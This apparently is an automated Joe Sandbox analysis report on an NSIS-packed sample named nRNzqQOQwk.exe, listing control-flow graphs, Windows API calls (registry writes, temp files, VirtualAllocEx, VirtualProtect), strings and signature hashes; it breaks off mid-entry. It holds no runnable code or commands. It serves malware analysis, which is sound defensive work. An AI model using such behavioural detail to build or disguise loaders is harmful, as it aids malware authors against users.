                                                                            control_flow_graph 689 402f33-402f47 690 402f50-402f59 689->690 691 402f49 689->691 692 402f62-402f67 690->692 693 402f5b 690->693 691->690 694 402f77-402f84 call 403122 692->694 695 402f69-402f72 call 403138 692->695 693->692 699 403110 694->699 700 402f8a-402f8e 694->700 695->694 701 403112-403113 699->701 702 402f94-402fba GetTickCount 700->702 703 4030bb-4030bd 700->703 706 40311b-40311f 701->706 707 402fc0-402fc8 702->707 708 403118 702->708 704 4030fd-403100 703->704 705 4030bf-4030c2 703->705 711 403102 704->711 712 403105-40310e call 403122 704->712 705->708 713 4030c4 705->713 709 402fca 707->709 710 402fcd-402fdb call 403122 707->710 708->706 709->710 710->699 722 402fe1-402fea 710->722 711->712 712->699 723 403115 712->723 716 4030c7-4030cd 713->716 719 4030d1-4030df call 403122 716->719 720 4030cf 716->720 719->699 726 4030e1-4030ed call 405aba 719->726 720->719 725 402ff0-403010 call 40621c 722->725 723->708 731 4030b3-4030b5 725->731 732 403016-403029 GetTickCount 725->732 733 4030b7-4030b9 726->733 734 4030ef-4030f9 726->734 731->701 735 40302b-403033 732->735 736 40306e-403070 732->736 733->701 734->716 737 4030fb 734->737 738 403035-403039 735->738 739 40303b-40306b MulDiv wsprintfA call 404fb9 735->739 740 403072-403076 736->740 741 4030a7-4030ab 736->741 737->708 738->736 738->739 739->736 742 403078-40307f call 405aba 740->742 743 40308d-403098 740->743 741->707 744 4030b1 741->744 749 403084-403086 742->749 747 40309b-40309f 743->747 744->708 747->725 750 4030a5 747->750 749->733 751 403088-40308b 749->751 750->708 751->747
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 551687249-2449383134
                                                                            • Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                            • Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
                                                                            • Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                                            • Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA

                                                                            Control-flow Graph

                                                                            control_flow_graph 752 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 759 40295e-40296d 752->759 760 40241f-402427 752->760 762 402437-40243a 760->762 763 402429-402436 call 402ace lstrlenA 760->763 764 40243c-40244d call 402aac 762->764 765 40244e-402451 762->765 763->762 764->765 770 402462-402476 RegSetValueExA 765->770 771 402453-40245d call 402f33 765->771 774 402478 770->774 775 40247b-402555 RegCloseKey 770->775 771->770 774->775 775->759 777 402729-402730 775->777 777->759
                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp
                                                                            • API String ID: 1356686001-3228911402
                                                                            • Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                            • Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
                                                                            • Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                                            • Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28

                                                                            Control-flow Graph

                                                                            control_flow_graph 778 405a42-405a4c 779 405a4d-405a78 GetTickCount GetTempFileNameA 778->779 780 405a87-405a89 779->780 781 405a7a-405a7c 779->781 783 405a81-405a84 780->783 781->779 782 405a7e 781->782 782->783
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405A56
                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
                                                                            Strings
                                                                            • nsa, xrefs: 00405A4D
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00405A42
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-4049198600
                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                            • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                            • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59

                                                                            APIs
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                            • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                              • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                              • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                              • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1791698881-3916222277
                                                                            • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                            • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                            • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                            • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60

                                                                            APIs
                                                                              • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Pongids Setup,NSIS Error), ref: 00405DAD
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                            • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                                            • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-2214159804
                                                                            • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                            • Instruction ID: 7328fd33adb38864c40c3ad9044401c3b5e3aae7bd0e1b9e961d96be1e2df883
                                                                            • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                            • Instruction Fuzzy Hash: D5F0A466115D6096D722333A1C05B9F1A48CEC2374759453BF891F12D2DB3C8953DD7E
                                                                            APIs
                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202A
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                              • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                              • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2987980305-0
                                                                            • Opcode ID: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                            • Instruction ID: 6acd92e4f6ebcd949653744c87f359efbc1ef98484dd96508818b65b31ed9250
                                                                            • Opcode Fuzzy Hash: dcd88b9650ca2fc532c8c5fc9ad8650594621bf6dfbf7b98fc17d5296bd1316f
                                                                            • Instruction Fuzzy Hash: 5921F671E00225EBDF307FA48F48AAE7A706B45354F20023BF701B22D1C6BE4A42D65E
                                                                            APIs
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                                              • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                              • Part of subcall function 0040547F: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\slavelivets,00000000,00000000,000000F0), ref: 0040163C
                                                                            Strings
                                                                            • C:\Users\user\slavelivets, xrefs: 00401631
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\slavelivets
                                                                            • API String ID: 1892508949-1403250623
                                                                            • Opcode ID: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                            • Instruction ID: f4e9a0c94948f709858838e9eb50a0f2792b4ff72a3a1ac07d5dbe4c8cdc963c
                                                                            • Opcode Fuzzy Hash: 180f8dbed9302a858d7acc3d4175b887fc009ffc70d4c8ebc0bf4da9f8c84f7e
                                                                            • Instruction Fuzzy Hash: D3112731508052EBDB217BB54D409BF26B09E92324B28457FF8D2B22E2D63D4D43A63F
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405ECC,00000000,00000002,?,00000002,0008C66D,?,00405ECC,80000002,Software\Microsoft\Windows\CurrentVersion,0008C66D,Call,0082E5E5), ref: 00405CB0
                                                                            • RegQueryValueExA.KERNELBASE(0008C66D,?,00000000,00405ECC,0008C66D,00405ECC), ref: 00405CD1
                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                            • Instruction ID: a78e2699c87532439836dc2b9ae7a1408ac691edae8af3cd19914ba1cc6957ae
                                                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                            • Instruction Fuzzy Hash: 9C015A7254420AEFEB128F65EC45EEB3FACEF14354F004436F905A6220D235D964DBA5
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
                                                                            • GetLastError.KERNEL32 ref: 100029AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AllocErrorLastVirtual
                                                                            • String ID:
                                                                            • API String ID: 497505419-0
                                                                            APIs
                                                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            APIs
                                                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            APIs
                                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                                            • String ID:
                                                                            • API String ID: 1938659011-0
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                              • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                              • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
                                                                              • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
                                                                            • GetLastError.KERNEL32 ref: 00405510
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                            • Instruction ID: 104873d821a1170e2273ca40e0eecd38832efcbc0b1179f41fab49dbd7078dd9
                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                            • Instruction Fuzzy Hash: 23C04C70629501FBDA106B209E097177D55AB90745F1049766106E20F4DA749451D92E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: wsprintf
                                                                            • String ID:
                                                                            • API String ID: 2111968516-0
                                                                            • Opcode ID: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                            • Instruction ID: cbf00d81cb97437f3a5b335f5c35441536f11fd869f9e222d526ef6a243a720c
                                                                            • Opcode Fuzzy Hash: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                            • Instruction Fuzzy Hash: 9521C970D0429ABEDF218B9885486AEBF749F01314F1445BFEC95B63D1C2BE8A81CF19
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                                              • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            • Opcode ID: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                            • Instruction ID: fecccce0915ab20f046520e702d9d3c2ebd546ffbad39029680d96f2603726cc
                                                                            • Opcode Fuzzy Hash: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                            • Instruction Fuzzy Hash: B8E01BB1B05115AFD701EB956A4987F7769DF40328F10443BF141F50D1C67E4D429B6D
                                                                            APIs
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID:
                                                                            • API String ID: 390214022-0
                                                                            • Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                            • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                                            • Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                                            • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                                            APIs
                                                                            • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: PathSearch
                                                                            • String ID:
                                                                            • API String ID: 2203818243-0
                                                                            • Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                            • Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
                                                                            • Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                                            • Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                            • Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
                                                                            • Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                                            • Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            APIs
                                                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID:
                                                                            • API String ID: 1096422788-0
                                                                            APIs
                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
                                                                            Memory Dump Source
